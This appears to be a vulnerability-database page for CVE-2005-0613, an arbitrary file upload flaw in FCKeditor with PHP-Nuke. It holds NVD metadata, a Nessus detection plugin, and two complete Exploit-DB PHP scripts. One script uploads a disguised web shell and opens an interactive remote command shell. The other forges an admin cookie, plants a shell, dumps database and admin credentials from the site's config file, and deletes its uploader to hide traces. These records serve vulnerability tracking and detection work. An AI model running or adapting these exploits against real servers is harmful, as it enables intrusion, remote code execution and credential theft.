ID CVE-2005-0613
Type cve
Reporter cve@mitre.org
Modified 2008-09-05T20:46:00
Description
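Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files. The NVD base score of 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N) counts integrity impact only; the related Nessus plugin record on this page states that the uploaded files can be run in the context of the web server user and scores the issue 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). That record gives the remediation as upgrading to FCKeditor version 2.0 RC3 or later.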
{"id": "CVE-2005-0613", "bulletinFamily": "NVD", "title": "CVE-2005-0613", "description": "Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.", "published": "2005-02-28T05:00:00", "modified": "2008-09-05T20:46:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0613", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/12676"], "cvelist": ["CVE-2005-0613"], "type": "cve", "lastseen": "2020-10-03T11:34:53", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["PHP_NUKE_FCKEDITOR_IMAGE_UPLOADS.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:14290"]}, {"type": "exploitdb", "idList": ["EDB-ID:6783", "EDB-ID:3702"]}], "modified": "2020-10-03T11:34:53", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-10-03T11:34:53", "rev": 2}, "vulnersScore": 5.6}, "cpe": ["cpe:/a:fckeditor:fckeditor:2.0_rc2"], "affectedSoftware": [{"cpeName": "fckeditor:fckeditor", "name": "fckeditor", "operator": "eq", "version": "2.0_rc2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:fckeditor:fckeditor:2.0_rc2:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:fckeditor:fckeditor:2.0_rc2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"nessus": [{"lastseen": "2021-01-01T04:54:56", "description": "The remote host is running a version of the FCKeditor add-on for\nPHP-Nuke that allows a remote attacker to upload arbitrary files and\nrun them in the context of the web server user.", "edition": 23, "published": "2005-03-01T00:00:00", "title": "FCKeditor for PHP-Nuke Arbitrary File Upload", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0613"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:phpnuke:php-nuke"], "id": "PHP_NUKE_FCKEDITOR_IMAGE_UPLOADS.NASL", "href": "https://www.tenable.com/plugins/nessus/17239", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17239);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2005-0613\");\n script_bugtraq_id(12676);\n\n script_name(english:\"FCKeditor for PHP-Nuke Arbitrary File Upload\");\n script_summary(english:\"Detects arbitrary file upload vulnerability in FCKeditor for PHP-Nuke\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from an\narbitrary code execution issue.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of the FCKeditor add-on for\nPHP-Nuke that allows a remote attacker to upload arbitrary files and\nrun them in the context of the web server user.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FCKeditor version 2.0 RC3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/01\");\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpnuke:php-nuke\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n script_dependencies(\"php_nuke_installed.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/php-nuke\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\ninstall = get_kb_item(\"www/\" + port + \"/php-nuke\");\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n if (safe_checks()) {\n r = http_send_recv3(method:\"GET\", item:dir + \"/modules.php?name=FCKeditor\", port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # according to _docs/whatsnew.html in the source, an Image button was\n # added in version 1.6.0 so it's probably safe to treat everything\n # from that through 2.0 RC2 as vulnerable.\n if (egrep(pattern:\"<br>FCKeditor (1\\.6|2\\.0 (BETA|RC1|RC2)) \", string:res)) {\n report = string(\n \"Nessus has determined the vulnerability exists on the target\\n\",\n \"simply by looking at the version number of FCKeditor\\n\",\n \"installed there.\\n\"\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n } \n else {\n # Try to exploit it.\n fname = \"nessus-plugin.gif.php\";\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"Newfile\"; filename=\"', fname, '\"', \"\\r\\n\",\n \"Content-Type: 
image/gif\\r\\n\",\n \"\\r\\n\",\n # NB: This is the actual exploit code; you could put pretty much\n # anything you want here.\n \"<?php phpinfo() ?>\\r\\n\",\n boundary, \"--\", \"\\r\\n\"\n );\n r = http_send_recv3(method:\"POST\", version: 11, port: port,\n item: dir + \"/modules/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=/\", \n add_headers: make_array(\"Content-Type\", \"multipart/form-data; boundary=\"+bound),\ndata: postdata);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # Now retrieve the \"image\" we just uploaded.\n #\n # nb: ServerPath defaults to \"/modules/FCKeditor/upload\" \n # in FCKeditor w/ PHP-Nuke.\n serverpath = \"/modules/FCKeditor/upload\";\n url = string(dir, serverpath, \"/Image/\", fname);\n r = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If we could run it, there's a problem.\n if (\"PHP Version\" >< res) {\n report = string(\n \"Nessus has successfully exploited this vulnerability by uploading\\n\",\n \"an image file with PHP code that reveals information about the\\n\",\n \"PHP configuration on the remote host. 
The file is located under\\n\",\n \"the web server's document directory as:\\n\",\n \" \", url, \"\\n\",\n \"You are strongly encouraged to delete this file as soon as\\n\",\n \"possible as it can be run by anyone who accesses it remotely.\\n\"\n );\n security_hole(port:port, extra:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:10", "bulletinFamily": "software", "cvelist": ["CVE-2006-0658", "CVE-2005-0613"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.fckeditor.net/\nSecurity Tracker: 1013320\n[Secunia Advisory ID:21117](https://secuniaresearch.flexerasoftware.com/advisories/21117/)\n[Secunia Advisory ID:18767](https://secuniaresearch.flexerasoftware.com/advisories/18767/)\nOther Advisory URL: http://retrogod.altervista.org/fckeditor_22_xpl.html\nOther Advisory URL: http://retrogod.altervista.org/toenda_100_shizouka_xpl.html\nOther Advisory URL: http://www.nsag.ru/vuln/893.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0294.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0434.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0153.html\nGeneric Exploit URL: http://milw0rm.com/exploits/3702\nFrSIRT Advisory: ADV-2006-0502\n[CVE-2005-0613](https://vulners.com/cve/CVE-2005-0613)\n[CVE-2006-0658](https://vulners.com/cve/CVE-2006-0658)\nBugtraq ID: 12676\n", "modified": "2005-02-28T00:00:00", "published": "2005-02-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:14290", "id": "OSVDB:14290", "type": "osvdb", "title": "FCKeditor connector.php File Upload Arbitrary PHP Code Execution", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:38:47", "description": "Nuke ET. CVE-2005-0613,CVE-2008-6178. 
Webapps exploit for php platform", "published": "2008-10-18T00:00:00", "type": "exploitdb", "title": "Nuke ET <= 3.4 - fckeditor Remote Arbitrary File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6178", "CVE-2005-0613"], "modified": "2008-10-18T00:00:00", "id": "EDB-ID:6783", "href": "https://www.exploit-db.com/exploits/6783/", "sourceData": "<?php\r\n\r\n/*\r\n\t---------------------------------------------------------------\r\n\tNuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit\r\n\t---------------------------------------------------------------\r\n\t\r\n\tauthor...: EgiX\r\n\tmail.....: n0b0d13s[at]gmail[dot]com\r\n\t\r\n\tlink.....: http://www.truzone.org/\r\n\t\r\n\tThis PoC was written for educational purpose. Use it at your own risk.\r\n\tAuthor will be not responsible for any damage.\r\n\t\r\n\t[-] vulnerable code in /nuke/FCKeditor/editor/filemanager/browser/default/connectors/php/commands.php\r\n\t\r\n\t147.\tfunction FileUpload( $resourceType, $currentFolder )\r\n\t148.\t{\r\n\t149.\t\t$sErrorNumber = '0' ;\r\n\t150.\t\t$sFileName = '' ;\r\n\t151.\t\r\n\t152.\t\tif ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )\r\n\t153.\t\t{\r\n\t154.\t\t\t$oFile = $_FILES['NewFile'] ;\r\n\t155.\t\r\n\t156.\t\t\t// Map the virtual path to the local server path.\r\n\t157.\t\t\t$sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;\r\n\t158.\t\r\n\t159.\t\t\t// Get the uploaded file name.\r\n\t160.\t\t\t$sFileName = $oFile['name'] ;\r\n\t161.\t\t\t$sOriginalFileName = $sFileName ;\r\n\t162.\t\t\t// Security fix by truzone 01-15-2006\r\n\t163.\t\t\t//$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;\r\n\t164.\t\t\t//$sExtension = strtolower( $sExtension ) ;\r\n\t165.\t\r\n\t166.\t\t\tif(extension_loaded(\"mime_magic\")){\r\n\t167.\t\t\t$sExtension = mime_content_type($oFile['tmp_name']);\r\n\t168.\t\t\t}else{\r\n\t169.\t\t\t$sExtension = 
$oFile['type'];\r\n\t170.\t\t\t}\r\n\t171.\t\t\t// en of security fix by truzone 01-15-2006\r\n\t172.\t\t\tglobal $Config ;\r\n\t173.\t\r\n\t174.\t\t\t$arAllowed\t= $Config['AllowedExtensions'][$resourceType] ;\r\n\t175.\t\t\t$arDenied\t= $Config['DeniedExtensions'][$resourceType] ;\r\n\r\n\tAn attacker might be able to upload arbitrary files containing malicious PHP code due to the code\r\n\tnear lines 166-170 will check only the MIME type of the upload request, that can be easily spoofed!\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n\t$sock = fsockopen($host, 80);\r\n\twhile (!$sock)\r\n\t{\r\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\r\n\t\t$sock = fsockopen($host, 80);\r\n\t}\r\n\tfputs($sock, $packet);\r\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\r\n\tfclose($sock);\r\n\treturn $resp;\r\n}\r\n\r\nfunction connector_response($html)\r\n{\r\n\treturn (preg_match(\"/OnUploadCompleted\\((\\d),\\\"(.*)\\\"\\)/\", $html, $match) && in_array($match[1], array(0, 201)));\r\n}\r\n\r\nprint \"\\n+------------------------------------------------------------------+\";\r\nprint \"\\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |\";\r\nprint \"\\n+------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n\tprint \"\\nUsage......: php $argv[0] host path\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /nukeet/\\n\";\r\n\tdie();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = ereg_replace(\"(/){2,}\", \"/\", $argv[2]);\r\n\r\n$filename = md5(time()).\".php\";\r\n$connector = \"FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php\";\r\n\r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"NewFile\\\"; 
filename=\\\"{$filename}\\\"\\r\\n\";\r\n$payload .= \"Content-Type: application/zip\\r\\n\\r\\n\";\r\n$payload .= \"PK\\003\\004<?php error_reporting(0);print(\\\"_code_\\\\n\\\");passthru(base64_decode(\\$_SERVER[HTTP_CMD])); ?>\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n\r\n$packet\t = \"POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\\r\\n\";\r\n$packet\t.= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $payload;\r\n\r\nif (!connector_response(http_send($host, $packet))) die(\"\\n[-] Upload failed!\\n\");\r\nelse print \"\\n[-] Shell uploaded to {$filename}...starting it!\\n\";\r\n\r\n$path .= str_repeat(\"../\", substr_count($path, \"/\") - 1) . \"UserFiles/File/\"; // come back to the document root \r\n\r\n$packet = \"GET {$path}{$filename} HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n\tprint \"\\nnukeet-shell# \";\r\n\t$cmd = trim(fgets(STDIN));\r\n\tif ($cmd != \"exit\")\r\n\t{\r\n\t\t$response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n\t\tpreg_match(\"/_code_/\", $response) ? print array_pop(explode(\"_code_\", $response)) : die(\"\\n[-] Exploit failed...\\n\");\r\n\t}\r\n\telse break;\r\n}\r\n\r\n?>\r\n\r\n# milw0rm.com [2008-10-18]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6783/"}, {"lastseen": "2016-01-31T19:06:31", "description": "InoutMailingListManager <= 3.1 Remote Command Execution Exploit. CVE-2005-0613,CVE-2006-0658,CVE-2007-2002,CVE-2007-2003,CVE-2007-2004. 
Webapps exploit fo...", "published": "2007-04-10T00:00:00", "type": "exploitdb", "title": "InoutMailingListManager <= 3.1 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0658", "CVE-2007-2004", "CVE-2005-0613", "CVE-2007-2003", "CVE-2007-2002"], "modified": "2007-04-10T00:00:00", "id": "EDB-ID:3702", "href": "https://www.exploit-db.com/exploits/3702/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"\nInoutMailingListManager <= 3.1 Command Execution Exploit + Login Retrieve + Advisory\nby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\nThanks to rgod for the php code and Marty for the Love\n\";\nif ($argc<4) {\necho \"Usage: php \".$argv[0].\" Site CMD\nHost: target server (ip/hostname)\nPath: path of phpMyNewsletter\nCMD: a shell command\nExample:\nphp \".$argv[0].\" localhost /inout/ cat /etc/password\";\n\ndie;\n}\n\n/*\nMultiple Vuln can be found in this NewsLetter Script.\n\nI) FCKEditor Vuln\n\nThis script uses an old version of FCKEditor, so you can upload arbitrary file with:\n\n[dir]\\FCKeditor\\editor\\filemanager\\browser\\default\\connectors\\php\\connector.php\n\n(See rgod exploits for more info on it)\n\n\nII) Login-Bypass\n\nThis is the code to check admin rights:\n\nif(!isset($_COOKIE['admin']))\n{\nheader(\"Location:index.php\");\n}\n\n1st: everyone can create a cookie named 'admin'\n2nd: you neither have to do it, because the script doesn't die after the check..\n\nThis exploit Uses this vuln to create the shell.\nWith Admin rights try to upload a PHP attachment, run it to retrieve config.inc.php and\ncreate a piggy_marty.php file. 
After that the script delete the uploaded attachment to leave\nno trace.\n\nIII) SQL Injections\n\nThere are SQL Injections EVERYWERE!\n\none 4 all, changename.php:\n\n$result=mysql_query(\"select value from \".$tableprefix.\"ea_extraparam where eid=$id\");\n\n\n\nBlackHawk <hawkgotyou@gmail.com>\n*/\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$port=80;\n$proxy=\"\";\n$cmd=\"\";\nfor ($i=3; $i<=$argc-1; $i++){\n$cmd.=\" \".$argv[$i];\n}\n$cmd=urlencode($cmd);\n\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\necho \"Step 0 - Check if piggy_marty.php already exist..\\r\\n\";\n$packet =\"GET \".$p.\"attachments/696969/piggy_marty.php?cmd=$cmd HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nif (strstr($html,\"666999\"))\n{\n echo \"Exploit succeeded...\\r\\n\";\n $temp=explode(\"666999\",$html);\n die(\"\\r\\n\".$temp[1].\"\\r\\n\");\n}\n\necho \"Step1 - Create a dir for the exploit\\r\\n\";\n$packet=\"GET \".$p.\"attach.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\nsleep(3);\necho \"Step2 - Upload The exploit Creator & Config Disclosure\\r\\n\";\n$data=\"-----------------------------7d529a1d23092a\\r\\n\";\n$data.=\"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"piggy_marty_creator.php\\\"\\r\\n\";\n$data.=\"Content-Type:\\r\\n\\r\\n\";\n$data.=\"<?php\n\\$fp=fopen('piggy_marty.php','w');\nfputs(\\$fp,'<?php error_reporting(0);\nset_time_limit(0);\nif (get_magic_quotes_gpc()) {\n\\$_GET[cmd]=stripslashes(\\$_GET[cmd]);\n}\necho 666999;\npassthru(\\$_GET[cmd]);\necho 666999;\n?>');\nfclose(\\$fp);\nchmod('piggy_marty.php',777);\ninclude '../../config.inc.php';\necho 'delimitator'.\\$mysql_server.'|'.\\$mysql_username.'|'.\\$mysql_password.'|'.\\$mysql_dbname.'|'.\\$username.'|'.\\$password;\n?>\\r\\n\";\n$data.=\"-----------------------------7d529a1d23092a--\\r\\n\";\n$packet=\"POST \".$p.\"attachfiles.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\\r\\n\";\n$packet.=\"Referer: http://\".$host.$path.\"/example.html\\r\\n\";\n$packet.=\"Accept-Language: it\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; 
boundary=---------------------------7d529a1d23092a\\r\\n\";\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n$packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\";\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n$packet.=\"Cookie: admin=BlackHawk\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nsleep(3);\necho \"Step3 - Create The Shell and Retrieve Login Information\\r\\n\";\n$packet=\"GET \".$p.\"attachments/696969/piggy_marty_creator.php HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode('delimitator',$html);\nlist($myserver,$myusername,$mypassword,$mydbname,$lgnusername,$lgnpassword)=explode('|',$temp[1]);\necho \"\n\n--- INFO FROM CONFIG.INC.PHP ---\n\nMySQL Server: $myserver\nMySQL Username: $myusername\nMySQL Password: $mypassword\nMySQL Database: $mydbname\n\nLogin: $lgnusername\nPassword: $lgnpassword\n\n--- END INFO ---\n\n\";\necho \"Step4 - Remove Shell Creator\\r\\n\";\n$packet=\"GET \".$p.\"attach.php?id=696969 HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n$temp=explode('piggy_marty_creator.php <a href=\"removeattach.php?id=',$html);\n$id=explode('&cid=696969',$temp[1]);\n$packet=\"GET \".$p.\"removeattach.php?cid=696969&id=\".$id[0].\" HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacketii($packet);\n\necho \"Step 5 - Check if piggy_marty.php already exist..\\r\\n\";\n$packet =\"GET \".$p.\"attachments/696969/piggy_marty.php?cmd=$cmd HTTP/1.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacketii($packet);\nif (strstr($html,\"666999\"))\n{\n echo \"Exploit succeeded...\\r\\n\";\n 
$temp=explode(\"666999\",$html);\n die(\"\\r\\n\".$temp[1].\"\\r\\n\");\n}\n?>\n\n# milw0rm.com [2007-04-10]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3702/"}]}